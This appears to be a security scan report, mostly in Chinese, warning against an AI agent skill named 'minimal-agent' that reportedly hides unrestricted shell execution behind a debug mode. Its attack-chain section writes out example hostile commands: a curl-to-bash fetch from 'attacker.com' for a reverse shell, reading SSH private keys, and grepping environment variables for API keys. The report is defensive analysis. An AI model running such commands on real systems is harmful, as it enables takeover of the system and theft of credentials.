扫描报告
75 /100
minimal-agent
极简 AI 操作系统控制代理(声称)- 实际提供无限制命令执行
Skill declares minimal OS control capabilities but secretly implements unrestricted arbitrary command execution through undocumented V1/text mode, enabling full system compromise.
不要安装此技能
DO NOT USE. The skill documents controlled hardware automation but actually enables unrestricted shell execution, arbitrary file operations, and network access with no guardrails. If a restricted OS control agent is needed, implement with explicit tool allowlisting and remove text/V1 mode entirely.
攻击链 7 步
⬡
提权 Skill marketed as minimal OS control agent with window management and hardware control
SKILL.md:1⬡
提权 V1/text mode documented as 'development/debugging' feature without emphasizing unrestricted command execution
SKILL.md:65⬡
提权 Attacker forces V1 mode via --text flag or config mode='force_text'
scripts/agent.py:444⬡
提权 execute_raw_command() passes arbitrary input to shell=True subprocess
scripts/agent.py:459◉
影响 Attacker executes: 'curl https://attacker.com/shell.sh | bash' for reverse shell
scripts/agent.py:459◉
影响 Attacker executes: 'cat ~/.ssh/id_rsa' to steal SSH keys
scripts/agent.py:459◉
影响 Attacker executes: 'env | grep API' to harvest credentials
scripts/agent.py:459安全发现 6 项
| 严重性 | 安全发现 | 位置 |
|---|---|---|
| 严重 | Unrestricted Arbitrary Command Execution via V1 Mode 代码执行 | scripts/agent.py:459 |
| 严重 | Documentation Mismatch: Claims Minimal Control But Enables Full System Access 文档欺骗 | SKILL.md:67 |
| 高危 | Direct Shell Injection via User Input 代码执行 | scripts/agent.py:459 |
| 高危 | Undeclared Elevated Permissions 权限提升 | SKILL.md:87 |
| 中危 | Python venv Path Hardcoded with User Home Directory 代码混淆 | scripts/agent.py:114 |
| 中危 | Potential Environment Variable Access for API Keys 凭证窃取 | scripts/agent.py:459 |
| 资源类型 | 声明权限 | 推断权限 | 状态 | 证据 |
|---|---|---|---|---|
| 命令执行 | WRITE | WRITE | ✓ 一致 | agent.py:run_script() uses subprocess |
| 文件系统 | WRITE | WRITE | ✓ 一致 | agent.py + V1 mode enables any file operation |
| 网络访问 | READ | READ_WRITE | ✗ 越权 | |
| 数据库 | NONE | WRITE | ✗ 越权 | |
| 环境变量 | NONE | READ | ✗ 越权 | |
| 技能调用 | NONE | WRITE | ✗ 越权 |
3 项发现
中危 外部 URL 外部 URL
https://skillhub.tencent.com/skills/system-controller SKILL.md:262 中危 外部 URL 外部 URL
https://clawhub.ai/wangjiaocheng/system-controller SKILL.md:271 中危 外部 URL 外部 URL
https://clawhub.ai/wangjiaocheng/system-controller/archive/main.zip SKILL.md:275 目录结构
3 文件 · 49.5 KB · 1255 行 Python 1f · 938L
Markdown 1f · 293L
TOML 1f · 24L
├─
▾
scripts
│ ├─
agent.py
Python
│ └─
config.toml
TOML
└─
SKILL.md
Markdown
依赖分析 2 项
| 包名 | 版本 | 来源 | 已知漏洞 | 备注 |
|---|---|---|---|---|
subprocess | stdlib | Python | 否 | Standard library only |
tomllib | stdlib | Python | 否 | Standard library only |
安全亮点
✓ V2/function-calling mode provides controlled execution with 55 predefined tools
✓ Dangerous operations (power_shutdown, process_kill, network_disable) have confirmation prompts in V2 mode
✓ Configuration allows disabling auto mode fallback to V1
✓ Timeout limits (30s) prevent indefinite command execution